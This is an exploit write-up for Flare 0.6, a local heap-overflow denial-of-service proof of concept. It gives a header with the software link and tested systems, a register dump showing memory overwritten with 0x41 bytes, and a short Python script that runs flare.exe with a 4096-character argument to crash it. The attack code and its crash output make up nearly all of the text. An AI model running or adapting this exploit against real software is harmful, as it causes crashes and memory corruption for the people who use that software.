# Exploit Title: Flare <= 0.6 local heap overflow DoS # Date: 3/7/2010 # Author: l3D # Software Link: http://www.nowrap.de/download/flare06doswin.zip # Version: 0.6 # Tested on: Windows 7, Windows XP SP2 and some linux distributions # Code:
#!/usr/bin/env python #IRC: irc.nix.co.il<http://irc.nix.co.il> #Site: xraysecurity.blogspot.com<http://xraysecurity.blogspot.com> <---- Coming soon!
#Registers: #EAX 003E0000 #ECX 003E1088 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..." #EDX 41414141 #EBX 00004141 #ESP 0022FB0C #EBP 0022FBDC #ESI 003E1080 #EDI 41414141 #EIP 77195B44 ntdll.77195B44
import os, sys
if len(sys.argv) != 1: path=sys.argv[1] else: path='flare.exe'
if not os.path.exists(path): print 'Usage: python %s [path to flare.exe]' % sys.argv[0] exit(-1)
os.execl(path, path, 'A'*0x1000)
|